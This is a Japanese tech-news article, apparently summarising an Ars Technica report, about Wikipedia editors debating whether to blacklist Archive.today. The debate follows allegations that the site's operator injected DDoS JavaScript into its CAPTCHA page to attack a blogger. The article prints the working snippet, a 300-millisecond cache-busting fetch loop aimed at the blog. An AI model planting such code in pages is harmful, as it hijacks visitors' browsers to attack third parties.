サイバーニュース.jp

世界のサイバーなニュースを配信

Archive.todayのDDoS攻撃関与でWikipediaがブラックリスト化を検討中

カテゴリ:

Wikipedia、Archive.todayの利用停止を検討

オンライン百科事典Wikipediaの編集者たちが、ウェブアーカイブサイトのArchive.today(Archive.isとしても知られる)を

ブラックリストに登録し、既存の約70万件のリンクを削除または非表示にするかどうかを議論しています。この動きは、Archive.todayが匿名ブロガーに対して分散型サービス拒否(DDoS)攻撃を仕掛けた疑惑が浮上したことを受けてのものです。

Wikipediaの「コメント依頼」ページでは、3つの選択肢が提示されています:Option A(サイトの全面禁止)、Option B(将来的な利用を非推奨とするが既存リンクは維持)、Option C(現状維持)です。Option Aが採用された場合、40万ページ以上にわたるArchive.todayへのリンクが影響を受けることになり、これは大きな変更となります。

DDoS攻撃の詳細と悪意あるコード

問題となっているDDoS攻撃は、ブロガーのJani Patokallio氏のGyrovagueブログを標的としたものです。2025年1月、Archive.todayの運営者は、同サイトのCAPTCHAページに悪意のあるJavaScriptコードを注入しました。これにより、ユーザーがCAPTCHAページにアクセスするたびに、そのインターネット接続が利用されてPatokallio氏のブログに対して攻撃が実行されるという事態が発生しました。

この悪意あるコードは、300ミリ秒ごとにランダムな文字列を使ってPatokallio氏のブログの検索機能にリクエストを送信し、キャッシュを回避してリソースを消費させるように設計されていました。

  • 悪意のあるJavaScriptコード:

    setInterval(function() { fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), { referrerPolicy: "no-referrer", mode: "no-cors" }); }, 300);

攻撃の背景と運営者による脅迫

このDDoS攻撃のきっかけは、Patokallio氏が2023年8月にArchive.todayの匿名運営者「Denis Petrov」(これも偽名とされる)の身元を特定しようと試みる記事を公開したことにあるようです。2025年10月、FBIがArchive.todayのドメイン登録業者に召喚状を送付したことを契機に、Patokallio氏の過去のブログ記事への関心が再燃しました。

その後、Patokallio氏とArchive.today運営者との間でメールのやり取りが行われ、運営者からは

Patokallio氏の「ナチスの祖父」に関する調査や、彼の名前を使った「AIポルノ」の作成など、脅迫的な内容が含まれていたと報告されています。運営者は、メディアがPatokallio氏のブログ記事を引用して「誤った物語」を構築していると主張し、記事の削除を求めていました。

WikipediaコミュニティとWikimedia Foundationの対応

Wikipediaの編集者たちは、この状況を受けて意見が分かれています。ある編集者は「検証可能な引用の必要性は、ユーザーのセキュリティよりも重要ではない」と述べ、ブラックリスト化を支持しています。一方で、現状維持を支持する編集者は、「Archive.todayには、Internet Archiveを含む他のどこにもない膨大なアーカイブが含まれている」と述べ、その代替が困難であることを強調しています。

Wikimedia Foundationの製品安全性および完全性グループ責任者であるEric Mill氏は、「サイトが提供する検証可能性の価値は、セキュリティリスクやリンクをクリックする人々の信頼の侵害と比較検討されるべきだ」と述べています。Foundationは、Archive.todayの運営者が「悪意のあるコードを通じて彼らの目標を追求するために地位を濫用する意思があるならば、それがホストするアーカイブの完全性についても疑問が生じる」と指摘し、コミュニティに慎重な検討を促しています。

今後の展望

Patokallio氏によれば、今回のDDoS攻撃は彼のホスティング費用に実害をもたらさなかったとのことです。しかし、この事件は、アーカイブサイトの信頼性と、それらを引用するプラットフォームのセキュリティ責任について深刻な問題を提起しています。

Wikipediaでの議論の結果はまだ出ていませんが、この状況は、Wikimedia Foundationが独自のアーカイブシステムをサポートするか、既存のInternet Archiveの活動をより体系的に支援する必要性を示唆していると多くの識者が指摘しています。

元記事: https://arstechnica.com/tech-policy/2026/02/wikipedia-might-blacklist-archive-today-after-site-maintainer-ddosed-a-blog/

投稿をさらに読み込む